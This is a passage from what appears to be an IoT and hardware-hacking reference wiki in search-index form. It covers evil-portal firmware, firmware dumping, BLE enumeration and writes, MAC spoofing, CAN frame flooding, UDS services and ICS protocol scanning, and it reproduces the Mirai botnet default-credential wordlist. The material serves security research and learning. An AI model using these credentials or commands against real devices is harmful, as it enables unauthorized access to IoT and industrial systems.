</ul>"},{"location":"gadgets/m5stack/#firmwares","title":"Firmwares","text":"<ul> <li>Firmware: 7h30th3r0n3/Evil-M5Core2</li> </ul> <p>Requirements:</p> <ul> <li><code>M5Stack</code> boards manager</li> <li><code>M5Unified</code> library</li> </ul> <p>Install:</p> <ul> <li>Connect your <code>M5Core2</code> to your computer.</li> <li>Open the <code>Arduino IDE</code> and load the provided code.</li> <li>Ensure the <code>M5unified</code> and <code>adafruit_neopixel</code> libraries are installed.</li> <li>Ensure the <code>esp32</code> and <code>M5stack</code> boards are installed (errors occur with esp32 <code>3.0.0-alpha3</code>; use esp32 <code>v2.0.14</code> or below).</li> <li>Place the required files (the startup IMG and the sites folder) on the SD card.</li> <li>Upload the script to your <code>M5Core2</code> device.</li> <li>Restart the device if needed.</li> </ul>"},{"location":"gadgets/m5stack/#references","title":"References","text":"<ul> <li>Evil-M5Core2 v1.1.3 - Serial Command - Github Project</li> <li>Evil Portal Meets Marauder on M5Stack!! Evil-M5Core2 Is the Best of Both Worlds! 
- Talking Sasquach - 7 Jan 2024</li> </ul>"},{"location":"gadgets/memory-programmer/","title":"Memory Programmer","text":"<p>RT809H with multiple adapters/sockets for eMMC/NAND Flash</p>"},{"location":"gadgets/micro-bit/","title":"Micro::bit","text":""},{"location":"gadgets/micro-bit/#extract-source-code-from-firmware","title":"Extract source code from firmware","text":"<p>When the source has been built from https://makecode.microbit.org/#editor, the JavaScript code is embedded into the firmware.</p> <pre><code>import bincopy\nimport sys\nimport subprocess\nimport json\n\n# Split the Intel HEX file into the raw firmware part and the embedded\n# MakeCode part; MakeCode separates the two sections with a blank line.\nwith open(sys.argv[1], 'r') as f:\n    fwstring = f.read()\nfwsplit = fwstring.split('\\n\\n')\n\nwith open('fw_raw.hex', 'w') as g:\n    g.write(fwsplit[0])\nwith open('fw_code.hex', 'w') as g:\n    g.write(fwsplit[1])\n\n# Convert the code section from Intel HEX to a flat binary\nf = bincopy.BinFile()\nf.add_ihex_file('fw_code.hex')\nbinary = f.as_binary()\nprint(\"[+] ihex converted to binary\")\n\n# The embedded source is an LZMA stream at an unknown offset in the\n# binary: brute-force the start offset and keep the first one that\n# decompresses to valid JSON.\nfor i in range(200):\n    with open('firmware.bin', 'w+b') as g:\n        g.write(binary[i:])\n\n    try:\n        data = subprocess.run([\"lzma\", \"firmware.bin\", \"-d\", \"--stdout\"], capture_output=True)\n        # The decompressed stream starts with a small JSON header object;\n        # the JSON document holding the source files follows it.\n        data = data.stdout.decode().split('}', 1)\n        data = data[1][1:]\n        data = json.loads(data)\n        print(data)\n        print(\"\\n[+] JavaScript code\")\n        print(data['main.ts'])\n        break  # stop at the first offset that decompresses and parses\n    except Exception:\n        continue\n</code></pre>"},{"location":"gadgets/micro-bit/#extract-firmware-using-swd","title":"Extract firmware using SWD","text":""},{"location":"gadgets/micro-bit/#connection","title":"Connection","text":"<p>Solder wires on SWD pins:</p> <p></p> <p>Connect to an ST-LINK v2:</p> <p></p>"},{"location":"gadgets/micro-bit/#openocd-profile","title":"OpenOCD profile","text":"<p>Official datasheet of the nRF51822:</p> <p>https://infocenter.nordicsemi.com/pdf/nRF51822_PS_v3.1.pdf</p> <p>Code section size:</p> <p></p> <p></p> <p>hex(1024*256) = 0x40000 =&gt; 0x00040000</p> 
<p>Content of <code>dump_fw.cfg</code>:</p> <pre><code>init\nreset init\nhalt\ndump_image image.bin 0x00000000 0x00040000\nexit\n</code></pre> <pre><code>$ sudo openocd -f /home/maki/tools/hardware/openocd/tcl/interface/stlink-v2-1.cfg -f /home/maki/tools/hardware/openocd/tcl/target/nrf51.cfg -f dump_fw.cfg\n</code></pre>"},{"location":"gadgets/micro-bit/#python-code","title":"Python code","text":"<p>Content of the dumped <code>image.bin</code> file:</p> <pre><code>$ strings image.bin\n[...]\nmain.py# Add your Python code here. E.g.\nfrom microbit import *\nwhile True:\n display.scroll('Hello, World!')\n displa\ny.show(Image.HEART)\n sleep(1000)\n print(\"coucou\")\n sleep(2000)\n</code></pre>"},{"location":"gadgets/proxmark/","title":"Proxmark","text":""},{"location":"gadgets/proxmark/#_1","title":"Proxmark","text":"<p>TODO</p>"},{"location":"gadgets/proxmark/#references","title":"References","text":""},{"location":"gadgets/pwnagotchi/","title":"Pwnagotchi","text":"<p>Documentation: https://pwnagotchi.ai/</p>"},{"location":"gadgets/raspberry-pi/","title":"Raspberry Pi","text":""},{"location":"gadgets/raspberry-pi/#gpio-header","title":"GPIO Header","text":""},{"location":"gadgets/raspberry-pi/#tools","title":"Tools","text":"<ul> <li>raspi-sec-tool - using a Raspberry Pi as a hacking tool</li> </ul>"},{"location":"gadgets/raspberry-pi/#references","title":"References","text":"<ul> <li>Raspberry Pi As Poor Man\u2019s Hardware Hacking Tool - Arun-Magesh - December 14, 2018</li> <li>Hardware Hacking with a Raspberry Pi - Configuring the PiFex - voidstarsec - JULY 2024</li> </ul>"},{"location":"other/default-iot-passwords/","title":"Default IoT Passwords","text":"<p>IoT Device Default Password Lookup : https://www.defpass.com</p>"},{"location":"other/default-iot-passwords/#mirai-wordlist","title":"Mirai Wordlist","text":"<p>Seclist Mirai Wordlist : https://raw.githubusercontent.com/danielmiessler/SecLists/master/Passwords/Malware/mirai-botnet.txt</p> <pre><code>root xc3511\nroot vizxv\nroot admin\nadmin admin\nroot
888888\nroot xmhdipc\nroot default\nroot jauntech\nroot 123456\nroot 54321\nsupport support\nroot (none)\nadmin password\nroot root\nroot 12345\nuser user\nadmin (none)\nroot pass\nadmin admin1234\nroot 1111\nadmin smcadmin\nadmin 1111\nroot 666666\nroot password\nroot 1234\nroot klv123\nAdministrator admin\nservice service\nsupervisor supervisor\nguest guest\nguest 12345\nadmin1 password\nadministrator 1234\n666666 666666\n888888 888888\nubnt ubnt\nroot klv1234\nroot Zte521\nroot hi3518\nroot jvbzd\nroot anko\nroot zlxx.\nroot 7ujMko0vizxv\nroot 7ujMko0admin\nroot system\nroot ikwb\nroot dreambox\nroot user\nroot realtek\nroot 000000\nadmin 1111111\nadmin 1234\nadmin 12345\nadmin 54321\nadmin 123456\nadmin 7ujMko0admin\nadmin pass\nadmin meinsm\ntech tech\nmother fucker\n</code></pre>"},{"location":"other/electronic-components/","title":"Electronic Components","text":""},{"location":"other/electronic-components/#resistors","title":"Resistors","text":""},{"location":"other/electronic-components/#capacitors","title":"Capacitors","text":""},{"location":"other/electronic-components/#transistors","title":"Transistors","text":""},{"location":"other/electronic-components/#inductors","title":"Inductors","text":""},{"location":"other/electronic-components/#integrated-circuit-ic-microchip","title":"Integrated Circuit (IC) microchip","text":""},{"location":"other/electronic-components/#microcontroller-unit-mcu","title":"Microcontroller Unit (MCU)","text":""},{"location":"other/electronic-components/#system-on-chip-soc","title":"System-on-Chip (SoC)","text":""},{"location":"other/electronic-components/#trusted-platform-module-tpm","title":"Trusted Platform Module (TPM)","text":""},{"location":"other/links-and-hardware-kits/","title":"Links &amp; Hardware Kits","text":""},{"location":"other/links-and-hardware-kits/#hardware-challenges-ctf","title":"Hardware Challenges &amp; CTF","text":"<ul> <li>BLE CTF</li> <li>Learning Bluetooth Hackery with BLE CTF</li> <li>BLUETOOTH LOW 
ENERGY CTF - WRITE UP ECLECTIC KOALA</li> <li>https://www.pentestpartners.com/security-blog/totally-pwning-the-tapplock-smart-lock/</li> <li>Damn Vulnerable IoT Device</li> <li>DVID - Damn Vulnerable IoT Device Challenges' writeup</li> <li>IoT Security - Hack the Damn : Vulnerable IoT Device - Arnaud COURTY - @vulcainreo</li> <li>findTheDatasheet - EN</li> <li>findTheDatasheet - FR</li> <li>defaultPassword - FR</li> <li>GreHack 2019: IOT Security: Hack The Damn Vulnerable IoT Device - Arnaud Courty</li> <li>Riscure CTF 3 (2017)</li> <li>Solving AVR reverse engineering challenge with radare2 - rhme2 Jumpy (reversing 100)</li> <li>Using UART / Serial to interact with an embedded device - rhme2 Setup</li> <li>SHA1 length extension attack on the Secure Filesystem - rhme2 Secure Filesystem (crypto 100)</li> <li>Start reverse engineering AVR - Memory Map and I/O Registers - rhme2 Reverse Engineering</li> <li>Defeat a stack cookie with bruteforce - rhme2 Photo manager (pwn 100)</li> <li>Format string exploit on an arduino - rhme2 Casino (pwn 150)</li> <li>Identifying UART and main() in an AVR firmware (ft. 
Zeta Two) part 1 - rhme2</li> <li>Riscure CTF 2 (2016)</li> <li>riscure embedded hardware CTF is over - loopback 0x03 - LiveOverflow - 3 march 2017</li> <li>rhme-2016 write-up Team HydraBus</li> <li>Riscure CTF 1 (2015)</li> <li>Reversing Raw Binary Firmware Files in Ghidra</li> <li>Dumper un Arduino - thanatos</li> <li>Dumping the Firmware from the device Using buspirate - Veera Babu</li> <li>Embedded/IoT Linux for Red-Blue Teams</li> <li>From printed circuits boards to exploits (PWNING IOT DEVICES LIKE A BOSS) @virtualabs | Hack in Paris '18-</li> </ul>"},{"location":"other/links-and-hardware-kits/#twitch-streaming","title":"Twitch &amp; Streaming","text":"<ul> <li>Twitch - virtualabs</li> <li>Youtube - VirtuVOD - VOD of twitch.tv/virtualabs</li> <li>Youtube - WHID We Hack In Disguise</li> </ul>"},{"location":"other/links-and-hardware-kits/#books","title":"Books","text":"<ul> <li>IoT Penetration Testing Cookbook: Identify vulnerabilities and secure your smart devices - Aaron Guzman, Aditya Gupta - Nov. 
29 2017</li> <li>The IoT Hacker's Handbook: A Practical Guide to Hacking the Internet of Things - Aditya Gupta - April 1 2019</li> <li>Practical IoT Hacking: The Definitive Guide to Attacking the Internet of Things - Fotios Chantzis, Ioannis Stais, Paulino Calderon, Evangelos Deirmentzoglou, Beau Woods</li> <li>Advanced Penetration Testing Hacking IoT - Richard Knowell - April 2 2019</li> </ul>"},{"location":"other/links-and-hardware-kits/#hardware-kits","title":"Hardware Kits","text":""},{"location":"protocols/bluetooth/","title":"Bluetooth","text":""},{"location":"protocols/bluetooth/#tools","title":"Tools","text":"<ul> <li>bettercap/bettercap</li> <li>expliot_framework/expliot</li> <li>hackgnar/bleah</li> <li>bluez/gatttool</li> <li>securing/gattacker</li> </ul>"},{"location":"protocols/bluetooth/#bluetooth-configuration","title":"Bluetooth configuration","text":"<p>Requirements and configuration for Kali Linux.</p> <pre><code>$ sudo apt-get install bluetooth blueman bluez\n$ sudo systemctl start bluetooth\n$ sudo hciconfig hci0 up\n</code></pre> <p>Enumerate Bluetooth devices</p> <pre><code>$ sudo hcitool lescan\n00:1A:7D:DA:71:06 Ph0wn Beacon\n25:55:84:20:73:70 (unknown)\n</code></pre> <p>[!CAUTION] <code>apt</code> doesn't have a recent version of bluez; recompile it with the following lines (gatttool is not installed by <code>make install</code>, hence the manual copy).</p> <pre><code>wget https://www.kernel.org/pub/linux/bluetooth/bluez-5.18.tar.xz\ndpkg --get-selections | grep -v deinstall | grep bluez\ntar xvf bluez-5.18.tar.xz\nsudo apt-get install libglib2.0-dev libdbus-1-dev libusb-dev libudev-dev libical-dev systemd libreadline-dev\ncd bluez-5.18\n./configure --enable-library\nmake -j8 &amp;&amp; sudo make install\nsudo cp attrib/gatttool /usr/local/bin/\n</code></pre>"},{"location":"protocols/bluetooth/#ble-enumerate-services-and-characteristics","title":"BLE - Enumerate services and characteristics","text":"<p>BLE data exchange is based on a specification called the Generic Attribute Profile (GATT), which defines how data is transferred between client and
server.</p> <ul> <li> <p>Using bettercap/bettercap <pre><code>sudo bettercap -eval \"net.recon off; events.stream off; ble.recon on\"\nble.show\nble.enum 04:52:de:ad:be:ef\n</code></pre></p> </li> <li> <p>Using expliot_framework/expliot <pre><code># List of Services\nrun ble.generic.scan -a &lt;mac address&gt; -s\n# List of characteristics\nrun ble.generic.scan -a &lt;mac address&gt; -c\n</code></pre></p> </li> <li> <p>Using hackgnar/bleah <pre><code>sudo bleah -b $MAC -e\n</code></pre></p> </li> </ul> <p>Using bluez/gatttool, we can enumerate the services and their characteristics; use <code>sudo gatttool -b $MAC -I</code> to get an interactive gatttool shell:</p> <ul> <li>Services: a set of provided features and associated behaviours used to interact with the peripheral. Each service contains a collection of characteristics.</li> <li>Characteristics: defined attribute types that contain a single logical value.</li> </ul> <pre><code>MAC=30:AE:A4:2A:54:8A\n\n$ gatttool -b $MAC --primary\nattr handle = 0x0001, end grp handle = 0x0005 uuid: 00001801-0000-1000-8000-00805f9b34fb\nattr handle = 0x0014, end grp handle = 0x001c uuid: 00001800-0000-1000-8000-00805f9b34fb\nattr handle = 0x0028, end grp handle = 0xffff uuid: 000000ff-0000-1000-8000-00805f9b34fb\n# Services whose UUID start with 00001801 (Generic Attribute) and 00001800 (Generic Access)\n# are standard services defined in the specification\n# The other one is a custom service which holds the CTF\n\n$ gatttool -b $MAC --characteristics\nhandle = 0x0002, char properties = 0x20, char value handle = 0x0003, uuid = 00002a05-0000-1000-8000-00805f9b34fb\nhandle = 0x0015, char properties = 0x02, char value handle = 0x0016, uuid = 00002a00-0000-1000-8000-00805f9b34fb\n</code></pre>"},{"location":"protocols/bluetooth/#ble-read-data","title":"BLE - Read data","text":"<p>Read data with gatttool</p> <pre><code>$ sudo gatttool -b $MAC -I\n[00:1A:7D:DA:71:06][LE]&gt; connect\n</code></pre> <ul> <li> <p>List characteristics</p>
<pre><code>[00:1A:7D:DA:71:06][LE]&gt; characteristics\nhandle: 0x000b, char properties: 0x0a, char value handle: 0x000c, uuid: 4b796c6f-5265-6e49-7342-61644a656469\n</code></pre> </li> <li> <p>Read characteristic at char handle</p> <pre><code>[00:1A:7D:DA:71:06][LE]&gt; char-read-hnd 0x000c\nCharacteristic value/descriptor: 44 65 63 72 79 70 74 20 74 68 65 20 6d 65 73 73 61 67 65 2c 20 77 72 69 74 65 20 74 68 65 20 64 65 63 72 79 70 74 65 64 20 76 61 6c 75 65 20 61 6e 64 20 72 65 61 64 20 62 61 63 6b 20 74 68 65 20 72 65 73 70 6f 6e 73 65 20 74 6f 20 66 6c 61 67 2e 20 45 6e 63 72 79 70 74 65 64 20 6d 65 73 73 61 67 65 3a 20 63 34 64 33 32 38 36 35 37 61 39 64 62 33 64 66 65 39 31 64 33 36 36 36 62 39 34 31 62 33 36 31\n</code></pre> </li> </ul> <p>One liner to read a characteristic</p> <pre><code>$ gatttool -b $MAC --char-read -a 0x002a|awk -F':' '{print $2}'|tr -d ' '|xxd -r -p;printf '\\n'\n</code></pre>"},{"location":"protocols/bluetooth/#ble-read-notificationindication","title":"BLE - Read notification/indication","text":"<pre><code>$ gatttool -b $MAC -a 0x0040 --char-write-req --value=0100 --listen\n$ gatttool -b $MAC -a 0x0044 --char-write-req --value=0200 --listen\n</code></pre>"},{"location":"protocols/bluetooth/#ble-write-data","title":"BLE - Write data","text":"<ul> <li> <p>Using bettercap/bettercap <pre><code>ble.recon on\nble.write 04:52:de:ad:be:ef 234bfbd5e3b34536a3fe723620d4b78d ffffffffffffffff\n</code></pre></p> </li> <li> <p>Using bluez/gatttool <pre><code>$ gatttool -b $MAC --char-write-req -a 0x002c -n $(echo -n \"12345678901234567890\"|xxd -ps)\n\n# With char-write, we perform a Write Command and don't expect a response from the server\n# With char-write-req, we perform a Write Request and expect a response from the server\n$ gatttool -b $MAC -a 0x0050 --char-write-req --value=$(echo -n 'hello' | xxd -p)\n\n# inside gatttool shell\n[00:1A:7D:DA:71:06][LE]&gt; char-write-req 0x000c 476f6f64205061646177616e21212121\n[00:1A:7D:DA:71:06][LE]&gt; 
char-read-hnd 0x000c\nCharacteristic value/descriptor: 43 6f 6e [...] 2e\n</code></pre></p> </li> </ul>"},{"location":"protocols/bluetooth/#bluetooth-mac","title":"Bluetooth MAC","text":"<p>Change the Bluetooth MAC address of the adapter (use <code>-t random</code> when the target uses a random address type):</p> <pre><code>$ bdaddr -r 11:22:33:44:55:66\n$ gatttool -I -b E8:77:6D:8B:09:96 -t random\n</code></pre>"},{"location":"protocols/bluetooth/#sniff-bluetooth-communication","title":"Sniff Bluetooth communication","text":""},{"location":"protocols/bluetooth/#using-ubertooth","title":"Using Ubertooth","text":"<p>You need three Ubertooth devices, one per advertising channel (37, 38 and 39):</p> <pre><code>ubertooth-btle -U 0 -A 37 -f -c bulb_37.pcap\nubertooth-btle -U 1 -A 38 -f -c bulb_38.pcap\nubertooth-btle -U 2 -A 39 -f -c bulb_39.pcap\n</code></pre>"},{"location":"protocols/bluetooth/#using-microbit","title":"Using Micro::Bit","text":"<ul> <li>WEAPONIZING THE BBC MICRO:BIT - DAMIEN CAUQUIL / VIRTUALABS - DEF CON 25 - JULY 28, 2017</li> </ul>"},{"location":"protocols/bluetooth/#using-android-hci","title":"Using Android HCI","text":"<p>Enable the Bluetooth HCI log on the device via Developer Options.</p> <p>It works like a hook in the stack to capture all the HCI packets in a file.
For most Android devices, the log file is at <code>/sdcard/btsnoop_hci.log</code> or under <code>/sdcard/oem_log/btsnoop/</code>.</p> <pre><code>$ adb devices\n$ adb pull /sdcard/oem_log/btsnoop/&lt;your log file&gt;.log\n$ adb pull /sdcard/btsnoop_hci.log\n$ adb bugreport filename\n</code></pre>"},{"location":"protocols/bluetooth/#challenges","title":"Challenges","text":"<ul> <li>BLE HackMe - works with nRF Connect (Android)</li> <li>hackgnar/ble_ctf - A Bluetooth low energy capture the flag</li> </ul>"},{"location":"protocols/bluetooth/#references","title":"References","text":"<ul> <li>A Practical Introduction to Bluetooth Low Energy security without any special hardware - Slawomir Jasek - 19 November 2020</li> <li>Denial of Pleasure: Attacking Unusual BLE Targets with a Flipper Zero - Matteo Mandolini &amp; Luca Bongiorni</li> <li>BLE CTF - wiki.elvis.science - Embedded Lab Vienna for IOT &amp; Security</li> <li>BLUETOOTH LOW ENERGY CTF - WRITE UP - ECLECTIC KOALA</li> <li>BLECTF, a \"Capture The Flag\" hardware platform based on Bluetooth Low Energy BLE + Write-Up - Hacker de Cabecera - February 04, 2020</li> </ul>"},{"location":"protocols/can/","title":"CAN Bus","text":"<p>The Controller Area Network (CAN) bus is a high-integrity serial communication protocol designed for real-time data exchange in embedded systems, particularly in automotive and industrial applications.
It operates on a multi-master, message-oriented architecture, allowing multiple devices (nodes) to communicate on the same network without a central controller.</p>"},{"location":"protocols/can/#interact","title":"Interact","text":"<pre><code>pip install python-can\npip install python-can-utils\n</code></pre> <pre><code>import can\n\n# uses the bus configured for python-can (e.g. in ~/.canrc); otherwise pass the\n# interface explicitly, e.g. can.Bus(interface='socketcan', channel='can0')\nbus = can.Bus()\nwhile True:\n    # the first positional argument of can.Message is the timestamp,\n    # so the CAN identifier has to be given as arbitration_id\n    msg = can.Message(arbitration_id=3, data=[0 for _ in range(8)])\n    bus.send(msg)\n</code></pre> <ul> <li>Tbruno25/can-explorer - Visualize CAN Bus messages in real time</li> </ul>"},{"location":"protocols/can/#uds","title":"UDS","text":"<p>Unified Diagnostic Services (UDS) is a communication protocol used in automotive Electronic Control Units (ECUs) to enable diagnostics, firmware updates, routine testing and more.</p>"},{"location":"protocols/can/#implementation","title":"Implementation","text":"<ul> <li>pylessard/python-udsoncan - Python implementation of UDS (ISO-14229) standard.</li> <li>driftregion/iso14229 - C implementation of ISO 14229 (UDS) server and client for embedded systems</li> </ul>"},{"location":"protocols/can/#sid","title":"SID","text":"<table> <thead> <tr> <th>UDS SID (Request)</th> <th>UDS SID (Response)</th> <th>UDS Service</th> <th>Details</th> </tr> </thead> <tbody> <tr> <td>0x10</td> <td>0x50</td> <td>Diagnostic Session Control</td> <td>Control which UDS services are available.</td> </tr> <tr> <td>0x11</td> <td>0x51</td> <td>ECU Reset</td> <td>Resets the ECU (includes hard reset, key off/on and soft reset).</td> </tr> <tr> <td>0x27</td> <td>0x67</td> <td>Security Access</td> <td>Enables use of security-critical services via authentication.</td> </tr> <tr> <td>0x28</td> <td>0x68</td> <td>Communication Control</td> <td>Turns sending/receiving of messages ON or OFF in the ECU.</td> </tr> <tr> <td>0x29</td> <td>0x69</td> <td>Authentication</td> <td>Enables more advanced authentication than 0x27 (PKI-based exchange).</td> </tr> <tr> <td>0x3E</td> <td>0x7E</td> <td>Tester Present</td> <td>Sends a heartbeat message periodically to remain in the existing session.</td> </tr> <tr> <td>0x83</td> <td>0xC3</td> <td>Access Timing Parameters</td> <td>View/modify timing parameters used in client/server communication.</td> </tr> <tr> <td>0x84</td> <td>0xC4</td> <td>Secured Data Transmission</td> <td>Send encrypted data via ISO 15764 (extended data link security).</td> </tr> <tr> <td>0x85</td> <td>0xC5</td> <td>Control DTC Settings</td> <td>Enable/disable detection of errors (e.g. used during diagnostics).</td> </tr> <tr> <td>0x86</td> <td>0xC6</td> <td>Response On Event</td> <td>Request that the ECU processes a service request if an event happens.</td> </tr> <tr> <td>0x87</td> <td>0xC7</td> <td>Link Control</td> <td>Set the baud rate for diagnostic access.</td> </tr> <tr> <td>0x22</td> <td>0x62</td> <td>Read Data By Identifier</td> <td>Read data from the targeted ECU, e.g. VIN, sensor data.</td> </tr> <tr> <td>0x23</td> <td>0x63</td> <td>Read Data By Address</td> <td>Read data from physical memory (e.g. to understand software behaviour).</td> </tr> <tr> <td>0x24</td> <td>0x64</td> <td>Read Scaling Data By Identifier</td> <td>Read information about how to scale data identifiers.</td> </tr> <tr> <td>0x2A</td> <td>0x6A</td> <td>Read Data By Identifier Periodic</td> <td>Request the ECU to broadcast sensor data at slow/medium/fast/stop rate.</td> </tr> <tr> <td>0x2C</td> <td>0x6C</td> <td>Dynamically Define Data Identifier</td> <td>Define data parameters for use in 0x22 or 0x2A dynamically.</td> </tr> <tr> <td>0x2E</td> <td>0x6E</td> <td>Write Data By Identifier</td> <td>Program specific variables determined by data parameters.</td> </tr> <tr> <td>0x3D</td> <td>0x7D</td> <td>Write Memory By Address</td> <td>Write information to the ECU's memory.</td> </tr> <tr> <td>0x14</td> <td>0x54</td> <td>Clear Diagnostic Information</td> <td>Delete stored DTCs.</td> </tr> <tr> <td>0x19</td> <td>0x59</td> <td>Read DTC Information</td> <td>Read stored DTCs as well as related information.</td> </tr> <tr> <td>0x2F</td> <td>0x6F</td> <td>Input Output Control By Identifier</td> <td>Gain control over ECU analog/digital inputs/outputs.</td> </tr> <tr> <td>0x31</td> <td>0x71</td> <td>Routine Control</td> <td>Initiate/stop routines (e.g. self testing, erasing of flash memory).</td> </tr> <tr> <td>0x34</td> <td>0x74</td> <td>Request Download</td> <td>Start request to add software/data to the ECU (including location/size).</td> </tr> <tr> <td>0x35</td> <td>0x75</td> <td>Request Upload</td> <td>Start request to read software/data from the ECU (including location/size).</td> </tr> <tr> <td>0x36</td> <td>0x76</td> <td>Transfer Data</td> <td>Perform the actual transfer of data following use of 0x74/0x75.</td> </tr> <tr> <td>0x37</td> <td>0x77</td> <td>Request Transfer Exit</td> <td>Stop the transfer of data.</td> </tr> <tr> <td>0x38</td> <td>0x78</td> <td>Request File Transfer</td> <td>Perform a file download/upload to/from the ECU.</td> </tr> <tr> <td></td> <td>0x7F</td> <td>Negative Response</td> <td>Sent with a negative response code when a request cannot be handled.</td> </tr> </tbody> </table>"},{"location":"protocols/can/#references","title":"References","text":"<ul> <li>Awesome CAN bus tools, hardware and resources - iDoka</li> <li>UDS SID Table | UDS SID Request And Response - rfwireless-world</li> <li>UDS Explained - A Simple Intro (Unified Diagnostic Services) - csselectronics</li> <li>Unified Diagnostic Services (UDS) Explained - A Simple Intro [2022] - csselectronics</li> </ul>"},{"location":"protocols/dnp3/","title":"DNP3","text":""},{"location":"protocols/dnp3/#discovery","title":"Discovery","text":"<p>DNP3 Clients</p> <ul> <li>DNP3 Client Master Simulator</li> <li>DNP3 Simulator</li> </ul> <p>DNP3 Nmap Script</p> <p>Source: dnp3-enumerate.nse</p> <pre><code>nmap -sT --script dnp3-enumerate.nse -p 20000 &lt;target_ip&gt;\n</code></pre>"},{"location":"protocols/dnp3/#traffic-generation","title":"Traffic Generation","text":"<ul> <li>DNP3 Crafter</li> </ul>"},{"location":"protocols/gps/","title":"GPS","text":"<p>TODO</p>"},{"location":"protocols/http/","title":"HTTP","text":"<ul> <li>HTTPS Proxy: Burp Suite, MITM Proxy, Fiddler</li> <li>Network Sniffer: Wireshark, tcpdump</li> </ul>"},{"location":"protocols/i2c/","title":"I2C","text":"<p>I2C (Inter-Integrated Circuit), pronounced \"I-squared-C\" or \"I-two-C\", is a popular communication protocol mainly used for low-speed, short-distance communication in embedded systems.</p>"},{"location":"protocols/i2c/#analysis","title":"Analysis","text":"<p>Enable I2C on the
Raspberry Pi via <code>raspi-config</code></p> <ul> <li> <p>i2c-tools <pre><code>sudo apt-get install i2c-tools\ni2cdetect -y 1\n</code></pre></p> </li> <li> <p>eeprog <pre><code>wget http://darkswarm.org/eeprog-0.7.6-tear5.tar.gz\ntar -xvf eeprog-0.7.6-tear5.tar.gz eeprog-0.7.6-tear12/\ncd eeprog-0.7.6-tear12/\nmake\nsudo make install\n</code></pre></p> </li> <li> <p>HydraBus <pre><code>i2c1&gt; show pins\ni2c1&gt; scan\n</code></pre></p> </li> </ul>"},{"location":"protocols/i2c/#read-write","title":"Read / Write","text":"<ul> <li>Read: <code>./eeprog -x /dev/i2c-1 0x50 -16 -r 0x00:0x10</code></li> <li>Write: <code>echo \"hello\" | ./eeprog -f -16 -w 0 -t 5 /dev/i2c-1 0x50</code></li> </ul>"},{"location":"protocols/i2c/#references","title":"References","text":"<ul> <li>How to Scan and Detect I2C Addresses - Carter Nelson</li> </ul>"},{"location":"protocols/lora/","title":"LoRa","text":""},{"location":"protocols/lora/#lora-with-arduino-on-8681mhz","title":"LoRa with Arduino on 868.1MHZ","text":"<p>Using the arduino-LoRa library on 868.1 MHz with spreading factor 10:</p> <pre><code>#include &lt;SPI.h&gt;\n#include &lt;LoRa.h&gt;\n\nvoid onReceive(int packetSize) {\n  Serial.print(\"packet recv\\n\");\n  // read packet\n  for (int i = 0; i &lt; packetSize; i++) {\n    Serial.print((char)LoRa.read());\n  }\n}\n\nvoid setup() {\n  Serial.begin(9600);\n  while (!Serial);\n\n  Serial.println(\"LoRa Receiver\");\n\n  if (!LoRa.begin(868.1E6)) {\n    Serial.println(\"Starting LoRa failed!\");\n    while (1);\n  }\n  LoRa.setSpreadingFactor(10);\n\n  // register the callback once and put the radio in continuous receive mode\n  LoRa.onReceive(onReceive);\n  LoRa.receive();\n}\n\nvoid loop() {\n  // nothing to do here: packets are handled in onReceive()\n}\n</code></pre>"},{"location":"protocols/lora/#bruteforce-all-the-eu-frequencies-and-the-spreadfactor","title":"Bruteforce all the EU frequencies and the SpreadFactor","text":"<pre><code>#include &lt;SPI.h&gt;\n#include &lt;LoRa.h&gt;\n\n// EU868 channels to sweep (LoRa.begin() below starts on 868.1 MHz)\nconst int NB_FREQ = 6;\nfloat freq[NB_FREQ] = { 868.3E6, 868.5E6, 867.1E6, 867.5E6, 867.7E6, 867.9E6 };\n\nvoid onReceive(int packetSize) {\n  Serial.print(\"packet recv\\n\");\n  // read packet\n  for (int i = 0; i &lt; packetSize; i++) {\n    Serial.print((char)LoRa.read());\n  }\n  Serial.println();\n}\n\nvoid setup() {\n  Serial.begin(9600);\n  while (!Serial);\n\n  Serial.println(\"LoRa Receiver\");\n\n  if (!LoRa.begin(868.1E6)) {\n    Serial.println(\"Starting LoRa failed!\");\n    while (1);\n  }\n  LoRa.onReceive(onReceive);\n}\n\nvoid loop() {\n  // try every frequency with every spreading factor (7 to 12), 5 s each\n  for (int i = 0; i &lt; NB_FREQ; i++) {\n    LoRa.setFrequency((long)freq[i]);\n    for (int j = 7; j &lt;= 12; j++) {\n      LoRa.setSpreadingFactor(j);\n      LoRa.receive();  // re-arm continuous receive after changing the radio settings\n      Serial.print(\"Listening on \");\n      Serial.print((long)freq[i]);\n      Serial.print(\" Hz, SF\");\n      Serial.println(j);\n      delay(5000);\n    }\n  }\n}\n</code></pre>"},{"location":"protocols/lora/#display-rssi-of-the-packet","title":"Display RSSI of the packet","text":"<p>The Received Signal Strength Indication (RSSI) is the received signal power, expressed in dBm (decibels relative to one milliwatt).</p> <p>The RSSI is a negative value: the closer to 0, the stronger the signal.</p> <p>Typical LoRa RSSI values are:</p> <ul> <li>RSSI minimum = -120 dBm.</li> <li>If RSSI = -30 dBm: the signal is strong.</li> <li>If RSSI = -120 dBm: the signal is weak.</li> </ul> <pre><code>#include &lt;SPI.h&gt;\n#include &lt;LoRa.h&gt;\n\nvoid onReceive(int packetSize) {\n  Serial.print(\"packet recv\\n\");\n  int rssi = LoRa.packetRssi();  // RSSI of the packet just received, in dBm\n  Serial.println(rssi);\n}\n\nvoid setup() {\n  Serial.begin(9600);\n  while (!Serial);\n\n  Serial.println(\"LoRa Receiver\");\n\n  if (!LoRa.begin(867.1E6)) {\n    Serial.println(\"Starting LoRa failed!\");\n    while (1);\n  }\n  LoRa.setSpreadingFactor(8);\n  LoRa.onReceive(onReceive);\n  LoRa.receive();\n}\n\nvoid loop() {\n  delay(1000);\n}\n</code></pre>"},{"location":"protocols/mms/","title":"MMS (IEC 61850)","text":""},{"location":"protocols/mms/#discovery","title":"Discovery","text":"<p>MMS Client</p> <ul> <li>Lib 61850</li> <li>IEC 61850 Open Server</li> </ul> <p>MMS Discovery Nmap Script</p> <p>Source: mms-identify.nse</p> <pre><code>nmap -d --script mms-identify.nse
